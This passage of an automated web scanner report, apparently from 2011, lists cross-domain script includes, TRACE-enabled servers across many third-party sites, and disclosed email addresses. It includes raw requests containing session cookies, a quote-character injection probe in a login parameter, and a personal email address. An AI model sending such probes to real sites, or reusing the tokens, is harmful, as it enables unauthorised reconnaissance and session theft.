   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

   <title>
   Wisconsin Association of
...[SNIP]...
<br>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
25.90. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3837 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<br>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
25.91. http://www.wi-ala.org/clubportal/loginretrieval.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/loginretrieval.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination.&username=
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A37%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D10%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:37 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
25.92. http://www.wi-ala.org/clubportal/memLogin.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/memLogin.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination%2E&username=%27 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D11%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.7.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D12%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
25.93. http://www.wi-ala.org/clubportal/wala/Page.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/wala/Page.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /clubportal/wala/Page.cfm?clubID=177&pubmenuoptID=1361 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.6.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D9%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>
Membership -
...[SNIP]...
<br>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
26. TRACE method is enabled  previous  next
There are 26 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

26.1. http://ads.keypromedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.keypromedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.keypromedia.com
Cookie: b37a0221eb270b3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:39 GMT
Server: Apache/2.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.keypromedia.com
Cookie: b37a0221eb270b3

26.2. http://attorney.findlaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /

Request

TRACE / HTTP/1.0
Host: attorney.findlaw.com
Cookie: dc20641a9fb3468

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:27 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: attorney.findlaw.com
Cookie: dc20641a9fb3468
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.3. http://c.statcounter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 9486aa8a4b45cd03

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:09:21 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 9486aa8a4b45cd03

26.4. http://capgroup.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgroup.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: capgroup.112.2o7.net
Cookie: 747cb1bf424b3455

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:44:41 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: capgroup.112.2o7.net
Cookie: 747cb1bf424b3455
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.5. http://d1.openx.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: d25290512cdeea1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:43 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: d25290512cdeea1
X-Forwarded-For: 173.193.214.243

26.6. http://elawmarketing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://elawmarketing.com
Path:   /

Request

TRACE / HTTP/1.0
Host: elawmarketing.com
Cookie: 9a2edb13dc639bc7

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:35:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: elawmarketing.com
Cookie: 9a2edb13dc639bc7

26.7. http://r.openx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 515ebe01af0c75c3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:12:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 515ebe01af0c75c3
X-Forwarded-For: 173.193.214.243

26.8. http://tracking.hubspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hubspot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 6eada76294e8b589

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:10:06 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 6eada76294e8b589

26.9. http://www.bisnow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bisnow.com
Cookie: afd2b6def13f4123

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bisnow.com
Cookie: afd2b6def13f4123

26.10. http://www.centrifugesystems.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centrifugesystems.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.centrifugesystems.com
Cookie: 1019c4c04e8b366e

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:50:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.centrifugesystems.com
Cookie: 1019c4c04e8b366e

26.11. http://www.dmoc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmoc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dmoc.com
Cookie: 5ca3ec08ae430168

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dmoc.com
Cookie: 5ca3ec08ae430168

26.12. http://www.elawmarketing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.elawmarketing.com
Cookie: b1ec50e783136737

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:35:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.elawmarketing.com
Cookie: b1ec50e783136737

26.13. http://www.forbes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.forbes.com
Cookie: 909590497c8d20c0

Response

HTTP/1.0 200 OK
Server: Apache/1.3.26
Content-Type: message/http
Backend: www
Content-Length: 90
Date: Thu, 12 May 2011 16:55:04 GMT
X-Cache: MISS
Connection: close

TRACE / HTTP/1.0
Cookie: 909590497c8d20c0
Host: www.forbes.com
X-Varnish: 137465884

26.14. http://www.letipli.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.letipli.com
Cookie: b1c1754c30ef5fd2

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:02:20 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Content-Type: message/http
Content-Length: 69

TRACE / HTTP/1.0
Host: www.letipli.com
Cookie: b1c1754c30ef5fd2

26.15. http://www.milbanktweed.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbanktweed.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.milbanktweed.org
Cookie: e7044460557a9b88

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 16:56:11 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 12 May 2011 16:56:11 GMT
Content-Type: message/http
Content-Length: 72

TRACE / HTTP/1.0
Host: www.milbanktweed.org
Cookie: e7044460557a9b88
26.16. http://www.nealgerber.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nealgerber.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nealgerber.com
Cookie: ce5447544d69c566

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:55:38 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Content-Type: message/http
Content-Length: 72

TRACE / HTTP/1.0
Host: www.nealgerber.com
Cookie: ce5447544d69c566

26.17. http://www.ngelaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ngelaw.com
Cookie: 6c44c694e254b3dd

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:09:38 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Content-Type: message/http
Content-Length: 68

TRACE / HTTP/1.0
Host: www.ngelaw.com
Cookie: 6c44c694e254b3dd

26.18. http://www.njsba.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.njsba.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.njsba.com
Cookie: 16ace478e62e9a49

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:55:51 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 67

TRACE / HTTP/1.0
Host: www.njsba.com
Cookie: 16ace478e62e9a49

26.19. http://www.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: d284b059e6d450db

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:53 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: d284b059e6d450db
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.20. http://www.ober.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ober.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ober.com
Cookie: 9d86b41ddab4f762

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:01 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ober.com
Cookie: 9d86b41ddab4f762

26.21. http://www.peckshaffer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.peckshaffer.com
Cookie: f2078656a3d53ba4

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:07 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.peckshaffer.com
Cookie: f2078656a3d53ba4

26.22. http://www.semmes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.semmes.com
Cookie: 1c2b13b4c6616180

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:02:43 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 68

TRACE / HTTP/1.0
Host: www.semmes.com
Cookie: 1c2b13b4c6616180

26.23. http://www.sleepertechnologies.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sleepertechnologies.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sleepertechnologies.com
Cookie: dfb0fa6185f3b707

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:41 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 81

TRACE / HTTP/1.0
Host: www.sleepertechnologies.com
Cookie: dfb0fa6185f3b707

26.24. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 9a90172cf4e4ed04

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 178
Date: Thu, 12 May 2011 20:19:33 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 9a90172cf4e4ed04
X-Forwarded-For: 173.193.214.243
host: www.stumbleupon.com
X-Pool-Chosen: default
X-Varnish: 1735040327
Connection: keep-alive

26.25. http://www.superlawyers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.superlawyers.com
Cookie: 3d39d9c8b5c9d01a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:34 GMT
Server: Apache/2.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.superlawyers.com
Cookie: 3d39d9c8b5c9d01a

26.26. http://www.weblinedesigns.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weblinedesigns.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weblinedesigns.com
Cookie: a88a04f63eff076d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:35:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.8.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.weblinedesigns.com
Cookie: a88a04f63eff076d

27. Email addresses disclosed  previous  next
There are 76 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

27.1. http://baxterhall.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://baxterhall.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: baxterhall.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=b99e9c47%2Dd25f%2D494e%2D9dc2%2D4c7b8f84071b; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Set-Cookie: CFTOKEN=0; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10450


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="
...[SNIP]...
<a href="mailto:michelle@baxterhall.com">
...[SNIP]...
27.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://citrix.howardrice.com
Path:   /Citrix/AccessPlatform/auth/login.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Citrix/AccessPlatform/auth/login.aspx HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://citrix.howardrice.com/Citrix/AccessPlatform/
Cookie: __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:13:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=ru30t0qng0gbjiqkh0lkkb45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 13456


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
